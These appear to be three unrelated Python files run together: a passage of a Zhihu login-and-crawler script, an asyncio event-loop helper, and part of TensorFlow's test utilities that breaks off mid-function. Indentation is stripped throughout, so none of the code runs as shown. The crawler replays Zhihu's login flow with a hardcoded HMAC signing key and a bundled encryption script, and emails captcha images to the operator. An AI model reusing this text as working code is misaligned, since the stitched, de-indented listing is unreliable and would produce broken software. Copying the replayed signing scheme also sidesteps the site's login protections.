def login(self, captcha_lang: str = 'en', load_cookies: bool = True):
"""
模拟登录知乎
:param captcha_lang: 验证码类型 'en' or 'cn'
:param load_cookies: 是否读取上次保存的 Cookies
:return: bool
若在 PyCharm 下使用中文验证出现无法点击的问题,
需要在 Settings / Tools / Python Scientific / Show Plots in Toolwindow,取消勾选
"""
if load_cookies and self.load_cookies():
self.logger.info('读取 Cookies 文件')
if self.check_login():
self.logger.info('登录成功')
return True
self.logger.warning('Cookies 已过期')
self._check_user_pass()
self.login_data.update({
'username': self.username,
'password': self.password,
'lang': captcha_lang
})
timestamp = int(time.time() * 1000)
self.login_data.update({
'captcha': self._get_captcha(self.login_data['lang']),
'timestamp': timestamp,
'signature': self._get_signature(timestamp)
})
headers = self.session.headers.copy()
headers.update({
'content-type': 'application/x-www-form-urlencoded',
'x-zse-83': '3_2.0',
'x-xsrftoken': self._get_xsrf()
})
data = self._encrypt(self.login_data)
login_api = 'https://www.zhihu.com/api/v3/oauth/sign_in'
resp = self.session.post(login_api, data=data, headers=headers)
if 'error' in resp.text:
self.logger.warning(json.loads(resp.text)['error'])
if self.check_login():
self.logger.info('登录成功')
return True
self.logger.warning('登录失败')
return False
def load_cookies(self):
"""
读取 Cookies 文件加载到 Session
:return: bool
"""
try:
self.session.cookies.load(ignore_discard=True)
return True
except FileNotFoundError:
return False
def check_login(self):
"""
检查登录状态,访问登录页面出现跳转则是已登录,
如登录成功保存当前 Cookies
:return: bool
"""
login_url = 'https://www.zhihu.com/signup'
resp = self.session.get(login_url, allow_redirects=False)
if resp.status_code == 302:
self.session.cookies.save()
return True
return False
def _get_xsrf(self):
"""
从登录页面获取 xsrf
:return: str
"""
self.session.get('https://www.zhihu.com/', allow_redirects=False)
for c in self.session.cookies:
if c.name == '_xsrf':
return c.value
raise AssertionError('获取 xsrf 失败')
def _get_captcha(self, lang: str):
"""
请求验证码的 API 接口,无论是否需要验证码都需要请求一次
如果需要验证码会返回图片的 base64 编码
根据 lang 参数匹配验证码,需要人工输入
:param lang: 返回验证码的语言(en/cn)
:return: 验证码的 POST 参数
"""
if lang == 'cn':
api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=cn'
else:
api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=en'
resp = self.session.get(api)
show_captcha = re.search(r'true', resp.text)
if show_captcha:
put_resp = self.session.put(api)
json_data = json.loads(put_resp.text)
img_base64 = json_data['img_base64'].replace(r'\n', '')
with open('./captcha.jpg', 'wb') as f:
f.write(base64.b64decode(img_base64))
img = Image.open('./captcha.jpg')
if lang == 'cn':
import matplotlib.pyplot as plt
plt.imshow(img)
self.logger.info('点击所有倒立的汉字,在命令行中按回车提交')
points = plt.ginput(7)
capt = json.dumps({'img_size': [200, 44],
'input_points': [[i[0] / 2, i[1] / 2] for i in points]})
else:
# img_thread = threading.Thread(target=img.show, daemon=True)
img_thread = threading.Thread(target=send_mail, args=(
self.sender, self.receivers, self.mail_pass,
'zhihu验证码为:\n<img src=\"cid:image1\">', 'captcha.jpg'),
daemon=True)
img_thread.start()
# 这里可自行集成验证码识别模块
capt = input('请输入图片里的验证码:')
# 这里必须先把参数 POST 验证码接口
self.session.post(api, data={'input_text': capt})
return capt
return ''
def _generate_captcha_text(self, img_stream):
return pytesseract.image_to_string(img_stream)
def _get_signature(self, timestamp: int or str):
"""
通过 Hmac 算法计算返回签名
实际是几个固定字符串加时间戳
:param timestamp: 时间戳
:return: 签名
"""
ha = hmac.new(b'd1b964811afb40118a12068ff74a12f4', digestmod=hashlib.sha1)
grant_type = self.login_data['grant_type']
client_id = self.login_data['client_id']
source = self.login_data['source']
# ha.update(bytes((grant_type + client_id + source + str(timestamp)), 'utf-8'))
ha.update((grant_type + client_id + source + str(timestamp)).encode('utf-8'))
return ha.hexdigest()
def _check_user_pass(self):
"""
检查用户名和密码是否已输入,若无则手动输入
"""
if not self.username:
self.username = input('请输入手机号:')
if self.username.isdigit() and '+86' not in self.username:
self.username = '+86' + self.username
if not self.password:
self.password = input('请输入密码:')
@staticmethod
def _encrypt(form_data: dict):
with open('./encrypt.js') as f:
js = execjs.compile(f.read())
# js = execjs.compile(f.read(), cwd=r'C:\Users\Administrator\AppData\Roaming\npm\node_modules')
return js.call('b', urlencode(form_data))
class ZhihuCrawler(object):
'''
本项目爬取的是用户登录后的推荐内容。
数据类型主要分为三种:zvideo、answer、article,zvideo和article好像都没啥用。这里只抓取了answer和article两种类型。
'''
def __init__(self, username=None, password=None, sender=None, receivers=None, mail_pass=None):
# 初始化日志功能
self.logger = Logger().logger
# 初始化cookie
self.account = ZhihuAccount(username, password, sender, receivers, mail_pass, logger=self.logger)
self.account.login(captcha_lang='en', load_cookies=True)
# session加载cookie
self.session = requests.session()
self.session.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')
self.session.cookies.load(ignore_discard=True)
self.first_url = 'https://www.zhihu.com/'
self.headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
}
# 初始化mongodb数据库
self.mongo = MongoClient('mongodb://127.0.0.1:27017')
self.collection = self.mongo['zhihu']['data']
def __del__(self):
self.mongo.close()
def _get_page(self, next_url=None):
url = next_url
try:
if url is None:
self.logger.info('正在获取第一页***')
resp = self.session.get(self.first_url, headers=self.headers)
if resp.status_code == 200:
return resp
else:
raise Exception(f'{resp.status_code}')
else:
url = url.encode().decode("raw_unicode_escape")
headers = self.headers
headers['referer'] = 'https://www.zhihu.com/'
self.logger.info(f'正在获取下一页***{url}')
resp = self.session.get(url, headers=headers)
if resp.status_code == 200:
return resp
else:
raise Exception(f'{resp.status_code}')
except:
self.account.login(captcha_lang='en', load_cookies=False)
self.session.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')
self.session.cookies.load(ignore_discard=True)
self.logger.warning(f'Encountered a cookie error, now retrying _get_page({url}).')
time.sleep(random.uniform(1, 4))
self._get_page(url)
def _get_first_page_html(self, response):
html = response.content.decode()
# with open('zhihu.html', 'w', encoding='utf-8') as f:
# f.write(html)
return html
def _get_first_page_data(self, html):
data = dict()
initial_data = re.findall('<script id="js-initialData" type="text/json">(.*?)</script>', html).pop()
initial_data = initial_data.encode().decode('raw_unicode_escape')
json_data = json.loads(initial_data)
json_answers = json_data['initialState']['entities'].get('answers')
item_list = list()
for answer_id, detail in json_answers.items():
# item文章
item = dict()
item['id'] = answer_id
item['type'] = detail.get('type', None)
item['url'] = detail.get('url', None)
item['author'] = dict()
item['author']['userType'] = detail['author'].get('userType', None)
item['author']['name'] = detail['author'].get('name', None)
item['createdTime'] = detail.get('createdTime', None)
item['updatedTime'] = detail.get('updatedTime', None)
item['votedupCount'] = detail.get('voteupCount', None)
item['thanksCount'] = detail.get('thanksCount', None)
item['commentCount'] = detail.get('commentCount', None)
item['question'] = dict()
item['question']['id'] = detail['question'].get('id', None)
item['question']['type'] = detail['question'].get('type', None)
item['question']['url'] = detail['question'].get('url', None)
item['question']['title'] = detail['question'].get('title', None)
item['content'] = detail.get('content', None)
item_list.append(item)
is_end = re.findall('"is_end":false', html).pop()
if 'false' in is_end:
next_url = re.findall('"paging".*?"next":"(.*?)"', html, re.DOTALL).pop()
data['next_url'] = next_url
data['item_list'] = item_list
return data
def _save_data(self, data):
for item in data.get('item_list'):
item['_id'] = item.get('id')
try:
self.collection.insert_one(item)
except DuplicateKeyError as e:
self.logger.warning(e)
return
def _get_json(self, response):
return response.json()
def _get_data(self, json):
data = dict()
item_list = list()
for each in json.get('data'):
print(each['target'].get('type'))
if each['target'].get('type') == 'zvideo':
continue
item = dict()
target = each.get('target')
item['id'] = target.get('id', None)
item['type'] = target.get('type', None)
item['url'] = target.get('url', None)
item['author'] = dict()
item['author']['userType'] = target['author'].get('user_type', None)
item['author']['name'] = target['author'].get('name', None)
item['createdTime'] = target.get('created_time', None)
item['updatedTime'] = target.get('updated_time', None)
item['votedupCount'] = target.get('voteup_count', None)
item['thanksCount'] = target.get('thanks_count', None)
item['commentCount'] = target.get('comment_count', None)
if item['type'] == 'answer':
item['question'] = dict()
item['question']['id'] = target['question'].get('id', None)
item['question']['type'] = target['question'].get('type', None)
item['question']['url'] = target['question'].get('url', None)
item['question']['title'] = target['question'].get('title', None)
item['content'] = target.get('content', None)
item_list.append(item)
is_end = json['paging'].get('is_end')
if not is_end:
next_url = json['paging'].get('next')
data['next_url'] = next_url.encode().decode('raw_unicode_escape')
data['item_list'] = item_list
return data
def run(self):
self.logger.info('开始爬取***')
next_url = None
# 1 发起首页请求、获取响应
response = self._get_page(next_url)
# 2 解析响应
html = self._get_first_page_html(response)
# 3 提取数据
data = self._get_first_page_data(html)
# 4 保存数据
self._save_data(data)
# 下一页请求
next_url = data.get('next_url', None)
time.sleep(5)
while True:
# try:
# 1 发起请求、获取响应
response = self._get_page(next_url)
# 2 解析响应
json = self._get_json(response)
# 3 提取数据
data = self._get_data(json)
# 4 保存数据
self._save_data(data)
# 下一页请求
next_url = data.get('next_url', None)
if next_url is None:
break
time.sleep(5)
# except Exception as e:
# print(e)
self.logger.info('爬取结束***')
class Logger(object):
def __init__(self):
# 获取logger对象
self._logger = logging.getLogger()
# 设置formart对象
self.formatter = logging.Formatter(fmt='%(asctime)s %(filename)s [line:%(lineno)d] %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
# 设置日志输出
self._logger.addHandler(self._get_file_handler('log.log'))
self._logger.addHandler(self._get_console_handler())
# 设置日志等级
self._logger.setLevel(logging.INFO)
def _get_file_handler(self, filename):
'''
获取文件日志handler
:param filename: 文件名
:return: filehandler
'''
# 实例化filehandler类
filehandler = logging.FileHandler(filename=filename, encoding='utf-8')
# 设置日志格式
filehandler.setFormatter(self.formatter)
return filehandler
def _get_console_handler(self):
'''
获取终端日志handler
:return: consolehandler
'''
# 实例化streamhandler类
consolehandler = logging.StreamHandler(sys.stdout)
# 设置日志格式
consolehandler.setFormatter(self.formatter)
return consolehandler
@property
def logger(self):
return self._logger
def send_mail(sender, receivers, mail_pass, content, image):
# 第三方 SMTP 服务
mail_host = "smtp.qq.com" # 设置服务器
message = MIMEMultipart()
message.attach(MIMEText(content, 'html', 'utf-8')) # 正文内容 plain代表纯文本,html代表支持html文本
message['From'] = sender
message['To'] = ','.join(receivers) # 与真正的收件人的邮箱不是一回事
subject = '%s自动邮件-%s' % (os.path.basename(__file__), time.ctime())
message['Subject'] = subject # 邮件标题
# 将图片显示在正文
with open(image, 'rb') as f:
# 图片添加到正文
msgImage = MIMEImage(f.read())
# 定义图片ID
msgImage.add_header('Content-ID', '<image1>')
message.attach(msgImage)
try:
smtpObj = smtplib.SMTP_SSL(mail_host, 465)
smtpObj.login(sender, mail_pass)
smtpObj.sendmail(sender, receivers, str(message)) # message.as_string()
smtpObj.quit()
print("验证码邮件已发送至%s" % receivers[0])
except smtplib.SMTPException as e:
print(e)
if __name__ == '__main__':
# 输入用户名和密码进行登录
username = ''
password = ''
sender = ''
receivers = ['']
mail_pass = ''
crawler = ZhihuCrawler(username, password, sender, receivers, mail_pass)
crawler.run()
|
internals.py
|
import asyncio
import atexit
import sys
from logging import disable, CRITICAL
from threading import Thread
def __run_loop(loop: asyncio.AbstractEventLoop):
asyncio.set_event_loop(loop)
loop.run_forever()
def __stop_loop(loop: asyncio.AbstractEventLoop, thread: Thread): # pragma: no cover
disable(CRITICAL)
tasks = []
if py_ver.major == 3 and py_ver.minor >= 7:
caller = asyncio
else:
caller = asyncio.Task
for task in caller.all_tasks(loop):
task.cancel()
tasks.append(task)
cancelled = False
shutdown = asyncio.run_coroutine_threadsafe(loop.shutdown_asyncgens(), loop)
shutdown.result()
while not cancelled:
cancelled = True
for task in tasks:
if not task.done():
cancelled = False
loop.call_soon_threadsafe(loop.stop)
thread.join()
loop.call_soon_threadsafe(loop.close)
def __clear_loop(): # pragma: no cover
__stop_loop(POKE_LOOP, _t)
POKE_LOOP = asyncio.new_event_loop()
py_ver = sys.version_info
_t = Thread(target=__run_loop, args=(POKE_LOOP,), daemon=True)
_t.start()
atexit.register(__clear_loop)
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import _pywrap_stacktrace_handler
from tensorflow.python import _pywrap_util_port
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable MLIR compilation.
def is_mlir_bridge_enabled():
return False
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable TFRT.
def is_tfrt_enabled():
return False
try:
from tensorflow.python.framework.is_tfrt_test_true import is_tfrt_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
def _get_object_count_by_type():
return collections.Counter([type(obj).__name__ for obj in gc.get_objects()])
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}".format(str(e)))
else:
raise
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
warmup_iters: The numer of warmup iterations, excluded from measuring.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# Some objects are newly created by _get_object_count_by_type(). So
# create and save as a dummy variable to include it as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
obj_count_by_type = _get_object_count_by_type()
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
